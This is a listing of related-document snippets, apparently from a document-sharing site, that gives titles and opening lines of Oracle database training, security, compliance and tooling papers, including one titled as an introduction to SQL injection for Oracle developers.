Oracle Database 11g: Administration I Course ID ORA900 Course Description Administration of the Oracle database management system (DBMS) software environment and of the server systems on which the DBMS
More information<Insert Picture Here> Oracle Database Vault
Oracle Database Vault Kamal Tbeileh Senior Principal Product Manager, Database Security The following is intended to outline our general product direction. It is intended for information
More informationRestore and Recovery Tasks. Copyright 2009, Oracle. All rights reserved.
Restore and Recovery Tasks Objectives After completing this lesson, you should be able to: Describe the causes of file loss and determine the appropriate action Describe major recovery operations Back
More informationCredit Cards and Oracle E-Business Suite Security and PCI Compliance Issues
Credit Cards and Oracle E-Business Suite Security and PCI Compliance Issues August 16, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development Integrigy
More informationCalling Java from PL/SQL
CHAPTER 27 Calling Java from PL/SQL The Java language, originally designed and promoted by Sun Microsystems and now widely promoted by nearly everyone other than Microsoft, offers an extremely diverse
More informationVirtual Private Database Features in Oracle 10g.
Virtual Private Database Features in Oracle 10g. SAGE Computing Services Customised Oracle Training Workshops and Consulting. Christopher Muir Senior Systems Consultant Agenda Modern security requirements
More informationOracle security done right. Secure database access on the (unix and linux) operating system level.
Oracle security done right. Secure database access on the (unix and linux) operating system level. By Frits Hoogland, VX Company Security is an important part of modern database administration, and is
More informationAWS Schema Conversion Tool. User Guide Version 1.0
AWS Schema Conversion Tool User Guide AWS Schema Conversion Tool: User Guide Copyright 2016 Amazon Web Services, Inc. and/or its affiliates. All rights reserved. Amazon's trademarks and trade dress may
More informationOracle Database 12c: Introduction to SQL Ed 1.1
Oracle University Contact Us: 1.800.529.0165 Oracle Database 12c: Introduction to SQL Ed 1.1 Duration: 5 Days What you will learn This Oracle Database: Introduction to SQL training helps you write subqueries,
More informationOracle SQL Developer for Database Developers. An Oracle White Paper June 2007
Oracle SQL Developer for Database Developers An Oracle White Paper June 2007 Oracle SQL Developer for Database Developers Introduction...3 Audience...3 Key Benefits...3 Architecture...4 Key Features...4
More informationCentralized Oracle Database Authentication and Authorization in a Directory
Centralized Oracle Database Authentication and Authorization in a Directory Paul Sullivan Paul.J.Sullivan@oracle.com Principal Security Consultant Kevin Moulton Kevin.moulton@oracle.com Senior Manager,
More informationODBC Client Driver Help. 2015 Kepware, Inc.
2015 Kepware, Inc. 2 Table of Contents Table of Contents 2 4 Overview 4 External Dependencies 4 Driver Setup 5 Data Source Settings 5 Data Source Setup 6 Data Source Access Methods 13 Fixed Table 14 Table
More informationCONFIGURATION MANUAL File Transfer Daemon. Version 3.6 - July 2013
CONFIGURATION MANUAL File Transfer Daemon Version 3.6 - July 2013 IP2Archive - Configuration Manual - File Transfer Daemon Version 3.6 Copyright EVS Broadcast Equipment S.A. Copyright 2003-2013. All rights
More informationContinuous Integration Part 2
1 Continuous Integration Part 2 This blog post is a follow up to my blog post Continuous Integration (CI), in which I described how to execute test cases in Code Tester (CT) in a CI environment. What I
More informationOptimizing the Performance of the Oracle BI Applications using Oracle Datawarehousing Features and Oracle DAC 10.1.3.4.1
Optimizing the Performance of the Oracle BI Applications using Oracle Datawarehousing Features and Oracle DAC 10.1.3.4.1 Mark Rittman, Director, Rittman Mead Consulting for Collaborate 09, Florida, USA,
More informationReal Application Testing. Fred Louis Oracle Enterprise Architect
Real Application Testing Fred Louis Oracle Enterprise Architect The following is intended to outline our general product direction. It is intended for information purposes only, and may not be incorporated
More informationCredit Cards and Oracle: How to Comply with PCI DSS. Stephen Kost Integrigy Corporation Session #600
Credit Cards and Oracle: How to Comply with PCI DSS Stephen Kost Integrigy Corporation Session #600 Background Speaker Stephen Kost CTO and Founder 16 years working with Oracle 12 years focused on Oracle
More informationAn Introduction to SQL Injection Attacks for Oracle Developers. January 2004 INTEGRIGY. Mission Critical Applications Mission Critical Security
An Introduction to SQL Injection Attacks for Oracle Developers January 2004 INTEGRIGY Mission Critical Applications Mission Critical Security An Introduction to SQL Injection Attacks for Oracle Developers
More information